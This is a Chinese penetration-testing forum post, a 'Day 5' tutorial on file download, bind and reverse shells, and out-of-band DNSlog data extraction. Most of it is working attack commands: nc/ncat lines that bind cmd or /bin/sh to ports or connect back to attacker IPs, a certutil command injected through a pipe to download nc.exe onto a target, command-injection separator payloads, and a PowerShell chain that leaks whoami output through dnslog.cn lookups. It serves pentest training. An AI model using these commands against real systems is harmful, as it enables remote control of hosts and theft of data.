【第5天】反弹shell(不回显带外&正反向连接&防火墙出入站&文件下载)-网安笔记论坛-知识分享-安全小天地

【第5天】反弹shell(不回显带外&正反向连接&防火墙出入站&文件下载)

web安全入门篇-渗透测试中常用的命令

1.linux命令

渗透测试中常用的linux命令

2.cmd命令

常用的cmd命令

3.powershell命令

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。
对于powershell,需要去学习,这里有三篇比较实用于渗透测试的文章。

Powershell攻击指南黑客后渗透之道系列——基础篇
Powershell攻击指南黑客后渗透之道系列——进阶利用
Powershell攻击指南黑客后渗透之道系列——实战篇

一、文件下载

描述:解决无图形化和数据传输

1.python开启web下载服务

python3 -m http.server 80

首先开启服务:

d2b5ca33bd105010

然后我们直接访问即可获取当前开启服务路径下的文件

d2b5ca33bd105107

此时,服务器端也会记录访问ip

d2b5ca33bd105215

 

2.文件下载在线地址

https://forum.ywhack.com/bountytips.php?download

d2b5ca33bd104313

二、反弹Shell命令

d2b5ca33bd104411

d2b5ca33bd104428

描述:解决数据回显和数据通讯

命令生成:https://forum.ywhack.com/shell.php

1. 正向连接:本地监听等待对方连接

  • Linux控制Windows
nc -e cmd -lvp 5566       //windows绑定CMD到本地5566端口
ncat 43.154.93.246 5566  //linux主动连接目标windows5566端口
  • d2b5ca33bd105434

    Windows控制Linux

ncat -e /bin/sh -lvp 5566  //linux绑定SH到本地5566端口
 nc 101.133.139.57 5566    //windows主动连接目标linux5566端口

d2b5ca33bd105531

2. 反向连接:主动给出去对方监听

  • Linux控制Windows
nc -e cmd 101.133.139.57 5566  //windows绑定CMD到目标linux5566端口
ncat -lvvp 5566               //linux监听5566端口,等待windows目标连接
  • d2b5ca33bd105730

    windows控制Linux

ncat -e /bin/sh 43.154.93.246 5566  //linux绑定SH到目标windows5566端口
nc -lvvp 5566                      //windows监听5566端口,等待linux5566连接

三、实战-正向连接&反向连接

1.使目标windows服务器下载nc

​127.0.0.1 | certutil.exe -urlcache -split -f http://101.133.139.57:80/nc.exe c://nc.exe

2.正向连接

127.0.0.1 | c:\\nc.exe -e cmd -lvp 5566 //windows本地绑定cmd 5566端口

ncat 43.154.116.147 5566               //linux去连接目标主机

3.反向连接

ncat -lvp 5566  //攻击机linux监听本地端口5566

127.0.0.1 | c:\\nc.exe -e cmd 101.133.139.57 5566  //window目标主机主动连接linux主机

四、带外查询Dnslog

描述:漏洞有,但是数据不回显

1.管道符

管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)

Windows->| & || &&

Linux->; | || & && “

例子:

ping 127.0.0.1 ; whoami
ping 127.0.0.1 | whoami
ping 127.0.0.1 || whoami
ping 127.0.0.1 & whoami
ping 127.0.0.1 && whoami
ping 127.0.0.1 whoami

2.利用powershell进行带外查询

描述:windows系统cmd无法执行whoami,用到powershell变量赋值把whoami执行结果给变量,结果带有“\” 导致ping无法执行

powershell命令: 

$x=whoami;

$x=$x.Replace('\','xxx');

$y='.thec6z.dnslog.cn';

$z=$x+$y;

ping $z

127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

3.DNSlog平台已接收到数据

d2b5ca33bd105918

 

请登录后发表评论

    请登录后查看回复内容